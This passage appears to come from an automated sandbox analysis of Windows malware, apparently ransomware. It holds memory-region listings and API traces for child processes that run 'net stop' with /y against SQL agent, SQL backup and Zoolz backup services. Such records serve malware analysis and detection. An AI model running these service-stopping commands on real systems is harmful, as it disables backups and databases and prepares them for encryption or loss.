= 13076 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13077 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 13078 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 13079 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13080 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13081 start_va = 0x450000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 13082 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13083 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13084 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13085 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 917 os_tid = 0xd88 Process: id = "374" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0xaffb000" os_pid = "0x810" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "366" os_parent_pid = "0xa78" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$CXDB /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13087 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13088 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13089 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13090 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 13091 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13092 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13093 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13094 start_va = 0xffb80000 end_va = 0xffbb2fff entry_point = 0xffb80000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 13095 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13096 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13097 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 13098 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 13099 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13100 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13101 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 13102 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13103 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13104 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13105 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13106 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13107 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 13108 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 13109 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 13110 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 13111 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 13112 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 13113 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 13114 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 13115 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 13116 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 13117 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 13118 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 13119 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13120 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13121 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 13122 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 13123 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13124 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13125 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 919 os_tid = 0x9f0 [0121.091] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fe70 | out: lpSystemTimeAsFileTime=0x26fe70*(dwLowDateTime=0xfd4d0dd0, dwHighDateTime=0x1d48689)) [0121.091] GetCurrentProcessId () returned 0x810 [0121.091] GetCurrentThreadId () returned 0x9f0 [0121.091] GetTickCount () returned 0x27ea1 [0121.091] QueryPerformanceCounter (in: lpPerformanceCount=0x26fe78 | out: lpPerformanceCount=0x26fe78*=1816800900000) returned 1 [0121.092] GetModuleHandleW (lpModuleName=0x0) returned 0xffb80000 [0121.092] __set_app_type (_Type=0x1) [0121.092] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffb99c9c) returned 0x0 [0121.092] __getmainargs (in: _Argc=0xffba4780, _Argv=0xffba4790, _Env=0xffba4788, _DoWildCard=0, _StartInfo=0xffba479c | out: _Argc=0xffba4780, _Argv=0xffba4790, _Env=0xffba4788) returned 0 [0121.092] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0121.093] GetConsoleOutputCP () returned 0x1b5 [0121.093] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffbacec0 | out: lpCPInfo=0xffbacec0) returned 1 [0121.093] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0121.094] sprintf_s (in: _DstBuf=0x26fe18, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0121.095] setlocale (category=0, locale=".437") returned="English_United States.437" [0121.096] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0121.096] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0121.096] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$CXDB /y" [0121.096] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26fbb0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0121.096] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0121.097] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fe08 | out: Buffer=0x26fe08*=0x3a4d50) returned 0x0 [0121.097] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fe08 | out: Buffer=0x26fe08*=0x3ac100) returned 0x0 [0121.097] _fileno (_File=0x7fefdba2a80) returned 0 [0121.097] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0121.097] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0121.097] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0121.097] _wcsicmp (_String1="config", _String2="stop") returned -16 [0121.097] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0121.097] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0121.097] _wcsicmp (_String1="file", _String2="stop") returned -13 [0121.097] _wcsicmp (_String1="files", _String2="stop") returned -13 [0121.097] _wcsicmp (_String1="group", _String2="stop") returned -12 [0121.097] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0121.097] _wcsicmp (_String1="help", _String2="stop") returned -11 [0121.097] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0121.097] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0121.097] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0121.097] _wcsicmp (_String1="session", _String2="stop") returned -15 [0121.097] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0121.097] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0121.097] _wcsicmp (_String1="share", _String2="stop") returned -12 [0121.097] _wcsicmp (_String1="start", _String2="stop") returned -14 [0121.097] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0121.097] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0121.097] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0121.097] _wcsicmp (_String1="accounts", _String2="SQLAgent$CXDB") returned -18 [0121.097] _wcsicmp (_String1="computer", _String2="SQLAgent$CXDB") returned -16 [0121.097] _wcsicmp (_String1="config", _String2="SQLAgent$CXDB") returned -16 [0121.097] _wcsicmp (_String1="continue", _String2="SQLAgent$CXDB") returned -16 [0121.097] _wcsicmp (_String1="cont", _String2="SQLAgent$CXDB") returned -16 [0121.098] _wcsicmp (_String1="file", _String2="SQLAgent$CXDB") returned -13 [0121.098] _wcsicmp (_String1="files", _String2="SQLAgent$CXDB") returned -13 [0121.098] _wcsicmp (_String1="group", _String2="SQLAgent$CXDB") returned -12 [0121.098] _wcsicmp (_String1="groups", _String2="SQLAgent$CXDB") returned -12 [0121.098] _wcsicmp (_String1="help", _String2="SQLAgent$CXDB") returned -11 [0121.098] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$CXDB") returned -11 [0121.098] _wcsicmp (_String1="localgroup", _String2="SQLAgent$CXDB") returned -7 [0121.098] _wcsicmp (_String1="pause", _String2="SQLAgent$CXDB") returned -3 [0121.098] _wcsicmp (_String1="session", _String2="SQLAgent$CXDB") returned -12 [0121.098] _wcsicmp (_String1="sessions", _String2="SQLAgent$CXDB") returned -12 [0121.098] _wcsicmp (_String1="sess", _String2="SQLAgent$CXDB") returned -12 [0121.098] _wcsicmp (_String1="share", _String2="SQLAgent$CXDB") returned -9 [0121.098] _wcsicmp (_String1="start", _String2="SQLAgent$CXDB") returned 3 [0121.098] _wcsicmp (_String1="stats", _String2="SQLAgent$CXDB") returned 3 [0121.098] _wcsicmp (_String1="statistics", _String2="SQLAgent$CXDB") returned 3 [0121.098] _wcsicmp (_String1="stop", _String2="SQLAgent$CXDB") returned 3 [0121.098] _wcsicmp (_String1="time", _String2="SQLAgent$CXDB") returned 1 [0121.098] _wcsicmp (_String1="user", _String2="SQLAgent$CXDB") returned 2 [0121.098] _wcsicmp (_String1="users", _String2="SQLAgent$CXDB") returned 2 [0121.098] _wcsicmp (_String1="msg", _String2="SQLAgent$CXDB") returned -6 [0121.098] _wcsicmp (_String1="messenger", _String2="SQLAgent$CXDB") returned -6 [0121.098] _wcsicmp (_String1="receiver", _String2="SQLAgent$CXDB") returned -1 [0121.098] _wcsicmp (_String1="rcv", _String2="SQLAgent$CXDB") returned -1 [0121.098] _wcsicmp (_String1="netpopup", _String2="SQLAgent$CXDB") returned -5 [0121.098] _wcsicmp (_String1="redirector", _String2="SQLAgent$CXDB") returned -1 [0121.098] _wcsicmp (_String1="redir", _String2="SQLAgent$CXDB") returned -1 [0121.098] _wcsicmp (_String1="rdr", _String2="SQLAgent$CXDB") returned -1 [0121.098] _wcsicmp (_String1="workstation", _String2="SQLAgent$CXDB") returned 4 [0121.098] _wcsicmp (_String1="work", _String2="SQLAgent$CXDB") returned 4 [0121.098] _wcsicmp (_String1="wksta", _String2="SQLAgent$CXDB") returned 4 [0121.098] _wcsicmp (_String1="prdr", _String2="SQLAgent$CXDB") returned -3 [0121.098] _wcsicmp (_String1="devrdr", _String2="SQLAgent$CXDB") returned -15 [0121.098] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$CXDB") returned -7 [0121.098] _wcsicmp (_String1="server", _String2="SQLAgent$CXDB") returned -12 [0121.098] _wcsicmp (_String1="svr", _String2="SQLAgent$CXDB") returned 5 [0121.098] _wcsicmp (_String1="srv", _String2="SQLAgent$CXDB") returned 1 [0121.098] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$CXDB") returned -7 [0121.098] _wcsicmp (_String1="alerter", _String2="SQLAgent$CXDB") returned -18 [0121.099] _wcsicmp (_String1="netlogon", _String2="SQLAgent$CXDB") returned -5 [0121.099] _wcsupr (in: _String="SQLAgent$CXDB" | out: _String="SQLAGENT$CXDB") returned="SQLAGENT$CXDB" [0121.099] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3ace10 [0121.108] GetServiceKeyNameW (in: hSCManager=0x3ace10, lpDisplayName="SQLAGENT$CXDB", lpServiceName=0xffba5750, lpcchBuffer=0x26fd28 | out: lpServiceName="", lpcchBuffer=0x26fd28) returned 0 [0121.109] _wcsicmp (_String1="msg", _String2="SQLAGENT$CXDB") returned -6 [0121.109] _wcsicmp (_String1="messenger", _String2="SQLAGENT$CXDB") returned -6 [0121.109] _wcsicmp (_String1="receiver", _String2="SQLAGENT$CXDB") returned -1 [0121.109] _wcsicmp (_String1="rcv", _String2="SQLAGENT$CXDB") returned -1 [0121.109] _wcsicmp (_String1="redirector", _String2="SQLAGENT$CXDB") returned -1 [0121.109] _wcsicmp (_String1="redir", _String2="SQLAGENT$CXDB") returned -1 [0121.109] _wcsicmp (_String1="rdr", _String2="SQLAGENT$CXDB") returned -1 [0121.109] _wcsicmp (_String1="workstation", _String2="SQLAGENT$CXDB") returned 4 [0121.109] _wcsicmp (_String1="work", _String2="SQLAGENT$CXDB") returned 4 [0121.109] _wcsicmp (_String1="wksta", _String2="SQLAGENT$CXDB") returned 4 [0121.109] _wcsicmp (_String1="prdr", _String2="SQLAGENT$CXDB") returned -3 [0121.109] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$CXDB") returned -15 [0121.109] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$CXDB") returned -7 [0121.109] _wcsicmp (_String1="server", _String2="SQLAGENT$CXDB") returned -12 [0121.109] _wcsicmp (_String1="svr", _String2="SQLAGENT$CXDB") returned 5 [0121.109] _wcsicmp (_String1="srv", _String2="SQLAGENT$CXDB") returned 1 [0121.109] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$CXDB") returned -7 [0121.109] _wcsicmp (_String1="alerter", _String2="SQLAGENT$CXDB") returned -18 [0121.109] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$CXDB") returned -5 [0121.109] NetServiceControl (in: servername=0x0, service="SQLAGENT$CXDB", opcode=0x0, arg=0x0, bufptr=0x26fd30 | out: bufptr=0x26fd30) returned 0x889 [0121.110] wcscpy_s (in: _Destination=0xffba80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0121.110] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0121.111] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffba5b50, nSize=0x800, Arguments=0xffba7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0121.113] GetFileType (hFile=0xb) returned 0x2 [0121.113] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fbf8 | out: lpMode=0x26fbf8) returned 1 [0121.113] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffba5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x26fbf0, lpReserved=0x0 | out: lpBuffer=0xffba5b50*, lpNumberOfCharsWritten=0x26fbf0*=0x1e) returned 1 [0121.113] GetFileType (hFile=0xb) returned 0x2 [0121.113] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fbf8 | out: lpMode=0x26fbf8) returned 1 [0121.114] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb81efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26fbf0, lpReserved=0x0 | out: lpBuffer=0xffb81efc*, lpNumberOfCharsWritten=0x26fbf0*=0x2) returned 1 [0121.114] _ultow (in: _Dest=0x889, _Radix=2554976 | out: _Dest=0x889) returned="2185" [0121.114] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffba5b50, nSize=0x800, Arguments=0xffba7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0121.114] GetFileType (hFile=0xb) returned 0x2 [0121.114] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fbf8 | out: lpMode=0x26fbf8) returned 1 [0121.114] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffba5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x26fbf0, lpReserved=0x0 | out: lpBuffer=0xffba5b50*, lpNumberOfCharsWritten=0x26fbf0*=0x34) returned 1 [0121.115] GetFileType (hFile=0xb) returned 0x2 [0121.115] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fbf8 | out: lpMode=0x26fbf8) returned 1 [0121.115] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb81efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26fbf0, lpReserved=0x0 | out: lpBuffer=0xffb81efc*, lpNumberOfCharsWritten=0x26fbf0*=0x2) returned 1 [0121.115] NetApiBufferFree (Buffer=0x3a4d50) returned 0x0 [0121.115] NetApiBufferFree (Buffer=0x3ac100) returned 0x0 [0121.115] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$CXDB /y" [0121.115] exit (_Code=2) Process: id = "375" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x79d0a000" os_pid = "0xb28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"Zoolz 2 Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13126 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13127 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13128 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13129 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 13130 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13131 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13132 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13133 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 13134 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13135 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13136 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 13137 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 13138 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13139 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13140 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 13141 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13142 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13143 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13144 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 920 os_tid = 0xad0 Process: id = "376" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x22e15000" os_pid = "0xb70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "368" os_parent_pid = "0x13fc" cmd_line = "C:\\Windows\\system32\\net1 stop \"SQL Backups\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13145 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13146 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13147 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13148 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 13149 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13150 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13151 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13152 start_va = 0xff8a0000 end_va = 0xff8d2fff entry_point = 0xff8a0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: 